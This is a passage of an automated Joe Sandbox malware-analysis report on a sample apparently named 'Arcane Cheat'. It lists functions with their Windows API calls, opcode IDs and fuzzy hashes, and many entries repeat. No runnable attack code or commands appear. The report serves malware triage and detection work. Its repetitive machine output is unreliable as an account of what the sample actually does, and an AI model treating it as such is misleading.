                                  • Instruction Fuzzy Hash: 3C71E071100B54AECB21DB34EC51AEBB7E8FF14301F44492EE5ABC7242DA366A88CF51
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00828384
                                    • Part of subcall function 00821380: __EH_prolog.LIBCMT ref: 00821385
                                    • Part of subcall function 00821380: new.LIBCMT ref: 008213FE
                                    • Part of subcall function 008219A6: __EH_prolog.LIBCMT ref: 008219AB
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: 90d14e45ebdd1ab691b77efec16ec5035d8e7091e3805c93c5a8b0c321ab9bb6
                                  • Instruction ID: 1adbfd824295f15f23e308547db378de02a3fa8189556d152a5e4cbe3de40ab0
                                  • Opcode Fuzzy Hash: 90d14e45ebdd1ab691b77efec16ec5035d8e7091e3805c93c5a8b0c321ab9bb6
                                  • Instruction Fuzzy Hash: 0341AE718416789ADF20EB64E855BEAB3A8FF50300F0440EAE58AE3092DF745AC8DF55
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00821E05
                                    • Part of subcall function 00823B3D: __EH_prolog.LIBCMT ref: 00823B42
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: 78a04e65914090dbe988f35a8e3604020360fc0b95c3b9e5412072435f85d53c
                                  • Instruction ID: 7436c1743fe7acaa91136527fda6de415a09269d3565dfeb481c53dbe9a2fa21
                                  • Opcode Fuzzy Hash: 78a04e65914090dbe988f35a8e3604020360fc0b95c3b9e5412072435f85d53c
                                  • Instruction Fuzzy Hash: 522139719041189FCF11EF98E9959EEBBF6FF68300F20006DE845A7251CB325E54CBA1
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 0083A7C8
                                    • Part of subcall function 00821380: __EH_prolog.LIBCMT ref: 00821385
                                    • Part of subcall function 00821380: new.LIBCMT ref: 008213FE
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: 71c24171a2b242edce597719d6b99dd43eedcd96f11b0e8acca8529c26ac8c5c
                                  • Instruction ID: b27c4309123c4c78cb89a316c85444d5cdff3cb080a192b16b1dd061cd7ede4c
                                  • Opcode Fuzzy Hash: 71c24171a2b242edce597719d6b99dd43eedcd96f11b0e8acca8529c26ac8c5c
                                  • Instruction Fuzzy Hash: 35216D71C042599ACF14DF98D9425EEB7B4FF69304F1004AAE809E3242DB356E46CBA2
                                  APIs
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: 1a62efbf7369d49bb1ff0b7e96fb0eb899b56a9f12dae03a0fd529391f26eb29
                                  • Instruction ID: 60cc20946246f7b884f2aa52a4b751a1e188cc185d21539b0ea7ad7bd31eaee0
                                  • Opcode Fuzzy Hash: 1a62efbf7369d49bb1ff0b7e96fb0eb899b56a9f12dae03a0fd529391f26eb29
                                  • Instruction Fuzzy Hash: 8E117C73E005389BCF22EAACEC459EEB736FF88750F004129F805E7251CA348D9486A1
                                  APIs
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                  • Instruction ID: 4b5a57753f6119afbc8565963b83b3b204aa55ddaec82ee4fe515ed4e5d8ae71
                                  • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                  • Instruction Fuzzy Hash: 0FF081705007359FDB38DA68E941626B7D4FF25320F20891AE497C2690E770D8C0C742
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00825BDC
                                    • Part of subcall function 0082B07D: __EH_prolog.LIBCMT ref: 0082B082
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: eabb232e70f0f0c56ce045582b38685a2d2f7b461b5f2f8f52d92f658db7eee6
                                  • Instruction ID: 25aebb9a35377c4fddf984e1ea5e6ed089938b3c55915cfad2f4ebf6a5be2188
                                  • Opcode Fuzzy Hash: eabb232e70f0f0c56ce045582b38685a2d2f7b461b5f2f8f52d92f658db7eee6
                                  • Instruction Fuzzy Hash: EF01A234901664DAC726F7A8D0153DDF7B4EF19300F8040ADA959932D3CBB01B08C653
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0084C13D,00000000,?,008467E2,?,00000008,?,008489AD,?,?,?), ref: 0084854A
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 6a3b7636837684f9bf7746f59478eda67673969b0e62eca389dcb42ce0d63fdb
                                  • Instruction ID: 67c77ccfb0e151f3731ae4729f391af725cd02e205138937c49a8c0f18fbdc7b
                                  • Opcode Fuzzy Hash: 6a3b7636837684f9bf7746f59478eda67673969b0e62eca389dcb42ce0d63fdb
                                  • Instruction Fuzzy Hash: CCE0ED31640A2DDAEB312B6D9C00B9EBB8CFB417F0F160220AC58E2084CF20CC0186E6
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,0082968F,?,?,?,?,00851FA1,000000FF), ref: 008296EB
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 07ee0aa025d51d1f887c7aefc40404930911f02b8e4d261f0506a91674005d4f
                                  • Instruction ID: c0aa6ef094c7794ecbff56f928c85c09564fc0d8a4209031b88c3f4139bdec18
                                  • Opcode Fuzzy Hash: 07ee0aa025d51d1f887c7aefc40404930911f02b8e4d261f0506a91674005d4f
                                  • Instruction Fuzzy Hash: E6F05E30556B258FDB318A24E948792B7E4FB22725F048B1ED0EB834E0A765689D8F40
                                  APIs
                                  • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0082A4F5
                                  Similarity
                                  • API ID: CloseFind
                                  • String ID:
                                  • API String ID: 1863332320-0
                                  • Opcode ID: a46fb3de67989406a345f2d896bbf183bb241d1caf6bb1b767f99b2e905f30ba
                                  • Instruction ID: 028d311ce3549aee6220f5e18fd542e1a4cf3b0db75696f8ff2e0ddb100eb6ab
                                  • Opcode Fuzzy Hash: a46fb3de67989406a345f2d896bbf183bb241d1caf6bb1b767f99b2e905f30ba
                                  • Instruction Fuzzy Hash: ADF0B4310097A0ABCA266BBC59047D7BB90FF06371F04CA4AF1F9821D2C27454D59723
                                  APIs
                                  • SetThreadExecutionState.KERNEL32(00000001), ref: 008306B1
                                  Similarity
                                  • API ID: ExecutionStateThread
                                  • String ID:
                                  • API String ID: 2211380416-0
                                  • Opcode ID: 370e803d0d8840ecaffcde52b55826cfa68a32cb464bed7a4fb21cc9f2966e8b
                                  • Instruction ID: ec26f84bc1eaafd78ae41d0a650709856580f4915065c2f99f1b5d05744b9475
                                  • Opcode Fuzzy Hash: 370e803d0d8840ecaffcde52b55826cfa68a32cb464bed7a4fb21cc9f2966e8b
                                  • Instruction Fuzzy Hash: EDD0C22520522066CA23336CA80A7FF1A0AFFC2B10F0A0021B04DD32D69E8A08864AE3
                                  APIs
                                  • GdipAlloc.GDIPLUS(00000010), ref: 00839D81
                                    • Part of subcall function 00839B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00839B30
                                  Similarity
                                  • API ID: Gdip$AllocBitmapCreateFromStream
                                  • String ID:
                                  • API String ID: 1915507550-0
                                  • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                  • Instruction ID: 833c7368aacdc551c91fe682a4ffbd32a974ab16595b46af2d532578e2de482c
                                  • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                  • Instruction Fuzzy Hash: 5ED0C73065420D7ADF41BA759C0397ABBA9FB81350F104565FC48D6251EFB1DE10A6E2
                                  APIs
                                  • GetFileType.KERNELBASE(000000FF,00829887), ref: 00829995
                                  Similarity
                                  • API ID: FileType
                                  • String ID:
                                  • API String ID: 3081899298-0
                                  • Opcode ID: ba7c6a05958326bba2f4d975a6e0edaf5783346da60f4d3bf975d359186a49f5
                                  • Instruction ID: ef686b86518eb51d6b30c2aa210012eca599fdfec0ceadf40eef205d0a86829f
                                  • Opcode Fuzzy Hash: ba7c6a05958326bba2f4d975a6e0edaf5783346da60f4d3bf975d359186a49f5
                                  • Instruction Fuzzy Hash: 9FD01231011650958F2147356D090997F51FB833B7F38C6A8D0A5C40A1D723C8C3F581
                                  APIs
                                  • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0083D43F
                                    • Part of subcall function 0083AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0083AC85
                                    • Part of subcall function 0083AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0083AC96
                                    • Part of subcall function 0083AC74: IsDialogMessageW.USER32(00010450,?), ref: 0083ACAA
                                    • Part of subcall function 0083AC74: TranslateMessage.USER32(?), ref: 0083ACB8
                                    • Part of subcall function 0083AC74: DispatchMessageW.USER32(?), ref: 0083ACC2
                                  Similarity
                                  • API ID: Message$DialogDispatchItemPeekSendTranslate
                                  • String ID:
                                  • API String ID: 897784432-0
                                  • Opcode ID: dbd66cc31af6ca57947baa43e4ee6fc6f405c04c9f2f566657bdf784e03edf1c
                                  • Instruction ID: 0881ce941c2c7d26c0e89e7920e6ab4b3e5c1713b1f32e32652dd7333732d460
                                  • Opcode Fuzzy Hash: dbd66cc31af6ca57947baa43e4ee6fc6f405c04c9f2f566657bdf784e03edf1c
                                  • Instruction Fuzzy Hash: A1D09E31144300ABD6162B55DE06F0F7AA6FB98B04F404664B389B40B28A62AD21DB17
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 1c65bb7a73c30b074939b8a3482fb351af98c346fcfd21b4ea1426926767da85
                                  • Instruction ID: 61d4e7c19450ba83cf68cd641e2bda219172ff3c1beff18e1783890652dc03e6
                                  • Opcode Fuzzy Hash: 1c65bb7a73c30b074939b8a3482fb351af98c346fcfd21b4ea1426926767da85
                                  • Instruction Fuzzy Hash: 72B012E926C3017C310932487C96C3B021CF4C0B11730493AB509E00C0E8407C4C4572
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 5e652cc6604971e4c0b00a90d736af856a72d2f420cb2060a161a3e7196adb75
                                  • Instruction ID: 53a2e2973f35ff43f1891147488787d2004d5b1d0901102e67903a17547115f8
                                  • Opcode Fuzzy Hash: 5e652cc6604971e4c0b00a90d736af856a72d2f420cb2060a161a3e7196adb75
                                  • Instruction Fuzzy Hash: 53B012F526C2016C710DB24C7D86D36029CF4C0B11B30442AB509D01C0E8407C0D0572
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DAB2
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 19a25bb35fae20643b5e5f34a8c3c9d991a01da4f4bb199cc9bc0f87a6fc3b69
                                  • Instruction ID: 226153cbfd40ea88f6f3434045541b3b7396d576f6b72cf09c067db2802f80db
                                  • Opcode Fuzzy Hash: 19a25bb35fae20643b5e5f34a8c3c9d991a01da4f4bb199cc9bc0f87a6fc3b69
                                  • Instruction Fuzzy Hash: 51B012F12AC201AC310872497D02D3A035CF0C0B15730C11BFC09C0144D8484C0C4573
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DAB2
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DBD5
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DBD5
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DBD5
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DBD5
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DAB2
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DC36
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DC36
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DC36
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
